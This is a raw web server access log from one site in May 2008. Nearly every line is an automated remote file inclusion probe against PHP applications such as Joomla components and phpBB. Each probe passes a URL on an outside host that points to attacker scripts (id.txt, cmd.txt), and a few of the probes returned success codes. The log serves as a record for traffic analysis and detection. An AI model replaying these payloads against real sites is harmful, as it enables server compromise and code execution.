212.116.174.9 - - [05/May/2008:09:16:41 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:16:45 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:16:49 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:16:54 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:16:57 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.130.79.61 - - [05/May/2008:09:17:50 -0700] "GET //samPHPweb//common/db.php?commonpath=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:09:17:55 -0700] "GET /logs/task.php?task=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:09:17:56 -0700] "GET /logs/task.php?task=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:09:17:57 -0700] "GET /task.php?task=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:09:17:57 -0700] "GET /task.php?task=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.53.100.57 - - [05/May/2008:09:17:57 -0700] "GET /logs/access_080215.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
64.13.224.83 - - [05/May/2008:09:18:08 -0700] "GET /logs/access_080219.log/extras/ext_cats.php?dir_path=http://www.autonomic.nl/en/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.224.83 - - [05/May/2008:09:18:09 -0700] "GET /extras/ext_cats.php?dir_path=http://www.autonomic.nl/en/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.224.83 - - [05/May/2008:09:18:09 -0700] "GET /logs/extras/ext_cats.php?dir_path=http://www.autonomic.nl/en/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:09:18:50 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:09:18:50 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:09:18:51 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:18:54 -0700] "GET /logs/access_080124.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:18:55 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:18:55 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.138.144 - - [05/May/2008:09:19:23 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.138.144 - - [05/May/2008:09:19:23 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.138.144 - - [05/May/2008:09:19:26 -0700] "GET /logs/access_080215.log/Ultrastats/include/functions_common.php?gl_root_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:09:19:34 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.89 - - [05/May/2008:09:19:48 -0700] "GET //error.php?error=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [05/May/2008:09:19:48 -0700] "GET /logs/access_071219.log//error.php?error=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [05/May/2008:09:19:48 -0700] "GET /logs//error.php?error=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:19:58 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:19:58 -0700] "GET /logs/access_080214.log//admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:19:59 -0700] "GET //admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:19:59 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:19:59 -0700] "GET /logs//admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:20:10 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:20:10 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.181.2.242 - - [05/May/2008:09:20:15 -0700] "GET /logs/access.log//forum.php?act=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:20:16 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.181.2.242 - - [05/May/2008:09:20:18 -0700] "GET //forum.php?act=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.181.2.242 - - [05/May/2008:09:20:19 -0700] "GET /logs//forum.php?act=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:09:20:20 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:09:20:20 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.29.40 - - [05/May/2008:09:20:21 -0700] "GET /logs/access_080324.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:20:26 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
210.109.102.108 - - [05/May/2008:09:21:05 -0700] "GET /logs/access.log//language.inc.php?langs_dir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.102.108 - - [05/May/2008:09:21:06 -0700] "GET //language.inc.php?langs_dir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.102.108 - - [05/May/2008:09:21:06 -0700] "GET /logs//language.inc.php?langs_dir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.149.169 - - [05/May/2008:09:21:11 -0700] "GET /logs/access_080215.log//content.php?inc=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.149.169 - - [05/May/2008:09:21:11 -0700] "GET //content.php?inc=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.149.169 - - [05/May/2008:09:21:11 -0700] "GET /logs//content.php?inc=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:21:26 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:21:30 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:21:30 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:21:33 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:21:34 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:21:37 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:09:21:39 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:09:21:40 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.6.21.230 - - [05/May/2008:09:22:03 -0700] "GET /logs/access_080205.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:09:22:20 -0700] "GET /logs/access_080308.log//mcf.php?content=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:09:22:20 -0700] "GET //mcf.php?content=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:09:22:20 -0700] "GET /logs//mcf.php?content=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:09:22:23 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:09:22:23 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:09:22:23 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:22:24 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:22:24 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:22:25 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.86.181.227 - - [05/May/2008:09:22:26 -0700] "GET //samPHPweb//common/db.php?commonpath=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:22:27 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:22:30 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:22:33 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:22:33 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:22:33 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:22:34 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:22:34 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:09:22:34 -0700] "GET /logs/access_080201.log//modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:09:22:36 -0700] "GET //modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:09:22:37 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:22:37 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.6.123.99 - - [05/May/2008:09:22:49 -0700] "GET /logs/access.log//forum.php?act=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.6.123.99 - - [05/May/2008:09:22:51 -0700] "GET //forum.php?act=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.6.123.99 - - [05/May/2008:09:22:53 -0700] "GET /logs//forum.php?act=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:23:03 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:23:07 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:09:23:10 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:09:23:10 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:23:13 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.231.120.104 - - [05/May/2008:09:23:16 -0700] "GET /logs/access_080218.log/index.php?option=com_sef&task=§ionid=&id=&mosConfig_absolute_path=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.89 - - [05/May/2008:09:23:20 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [05/May/2008:09:23:20 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [05/May/2008:09:23:20 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.231.120.104 - - [05/May/2008:09:23:21 -0700] "GET /index.php?option=com_sef&task=§ionid=&id=&mosConfig_absolute_path=http://users.volja.net/smrad/60.php?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
81.231.120.104 - - [05/May/2008:09:23:22 -0700] "GET /logs/index.php?option=com_sef&task=§ionid=&id=&mosConfig_absolute_path=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:09:23:50 -0700] "GET /logs/access_080131.log/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:23:51 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:09:23:51 -0700] "GET /index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:09:23:52 -0700] "GET /logs/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:23:54 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:23:58 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.238.225.165 - - [05/May/2008:09:24:08 -0700] "GET /logs/index.php?configFile=http://www.loichua.org/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:24:09 -0700] "GET //mcf.php?content=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.238.225.165 - - [05/May/2008:09:24:14 -0700] "GET /index.php?configFile=http://www.loichua.org/.debug/id1.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [05/May/2008:09:24:24 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:24:25 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.220.202.24 - - [05/May/2008:09:24:25 -0700] "GET /logs/access_080131.log/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:24:25 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:24:26 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.220.202.24 - - [05/May/2008:09:24:30 -0700] "GET /logs/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.24 - - [05/May/2008:09:24:33 -0700] "GET /index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.51.194 - - [05/May/2008:09:24:36 -0700] "GET /logs/access_080131.log/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [05/May/2008:09:24:41 -0700] "GET /logs/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [05/May/2008:09:24:44 -0700] "GET /index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:09:24:51 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:09:24:52 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:09:24:52 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
58.26.137.64 - - [05/May/2008:09:24:53 -0700] "GET /logs/access_080218.log//components/com_simpleboard/image_upload.php?sbp=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:24:55 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:24:55 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:24:55 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
